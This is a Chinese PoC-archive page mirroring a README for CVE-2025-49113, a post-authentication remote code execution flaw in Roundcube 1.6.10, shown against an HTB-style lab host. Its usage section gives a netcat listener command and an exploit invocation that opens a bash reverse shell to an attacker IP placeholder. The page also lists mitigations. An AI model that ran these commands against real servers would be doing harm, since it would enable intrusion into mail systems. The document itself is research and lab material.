POC详情: d966c85bed97dc63aae26e3c7f5165046150108e

来源
关联漏洞
标题: Roundcube Webmail 安全漏洞 (CVE-2025-49113)
描述:Roundcube Webmail是Roundcube开源的一款基于浏览器的开源IMAP客户端,它支持地址薄管理、信息搜索、拼写检查等。 Roundcube Webmail 1.5.10之前版本和 1.6.11之前版本存在安全漏洞,该漏洞源于未验证_from参数,可能导致PHP对象反序列化攻击。
介绍
# CVE-2025-49113 – Roundcube 1.6.10 Authenticated Remote Code Execution

> ⚠️ **Disclaimer**  
This repository is intended strictly for educational and research purposes.  
All demonstrations were performed in a controlled lab environment.  
Unauthorized testing or exploitation of systems without explicit permission is illegal and unethical. The author is not responsible for any misuse of this information.

---

## 📌 What Is Roundcube?

**Roundcube** is a widely used, browser-based IMAP email client written in PHP. It provides a user-friendly interface for webmail access and is commonly deployed by hosting providers, academic institutions, and internal enterprise mail servers.

---

## 🚨 About the Vulnerability

**CVE-2025-49113** is a vulnerability affecting **Roundcube version 1.6.10** that allows an **authenticated user** to achieve **remote code execution** (RCE) by submitting a crafted command through the webmail interface.

Successful exploitation requires valid user credentials. Once exploited, it grants system-level command execution based on the web server's context.

- **CVE ID**: CVE-2025-49113  
- **Affected Application**: Roundcube 1.6.10  
- **Vulnerability Type**: Authenticated Remote Code Execution  
- **Exploit Type**: Reverse Shell via PHP Payload  
- **Exploit Availability**: [Public GitHub PoC](https://github.com/hakaioffsec/CVE-2025-49113-exploit)

---

## ⚙️ Lab Setup

- **Target URL**: `http://mail.outbound.htb`  
- **Roundcube Version**: 1.6.10  
- **Listener**: Netcat on port `4444`  
- **Exploit**: `CVE-2025-49113.php`

---

## 🚀 Exploit Usage

### 1. Start Netcat Listener

```bash
nc -nlvp 4444
```

### 2. Run the Exploit

```bash
php CVE-2025-49113.php {url} {username} {password} "bash -c 'bash -i >& /dev/tcp/<YOUR-IP>/4444 0>&1'"
```

> 🔧 Replace `<YOUR-IP>` with your attacker's IP.

---

## 📸 Demonstration

### Exploit Script Output

![Exploit Script Running](./img/roundcube.png)

### Reverse Shell Captured

![Reverse Shell Listener](./img/reverse_shell.png)

---

## 🔐 Mitigation

- Upgrade Roundcube to the latest stable and secure release.
- Remove or restrict user access to vulnerable components.
- Enforce strong access controls and IP whitelisting for webmail interfaces.
- Monitor authentication logs for anomalies.
- Apply least privilege principles on web server environments.

---

## 📝 Notes

- Exploit requires authentication.
- Only tested against Roundcube 1.6.10.
- The user context of the shell depends on the server configuration.
- Demonstration conducted in a virtual lab environment.

---

## 📚 References

- [OffSec Blog Post](https://www.offsec.com/blog/cve-2025-49113/)  
- [Public Exploit](https://github.com/hakaioffsec/CVE-2025-49113-exploit)  

---

## 📝 Medium Blog

Check out the detailed walkthrough and theory on my Medium post:  
👉 **[Read the blog on Medium](https://medium.com/@cyberquestor/cve-2025-49113-roundcube-1-6-10-remote-code-execution-0598e7944361?sk=b0023c78b7f0d8de5e683f4d2316967d)**
文件快照

[4.0K] /data/pocs/d966c85bed97dc63aae26e3c7f5165046150108e ├── [4.0K] img │   ├── [ 44K] reverse_shell.png │   └── [ 65K] roundcube.png └── [3.0K] README.md 1 directory, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。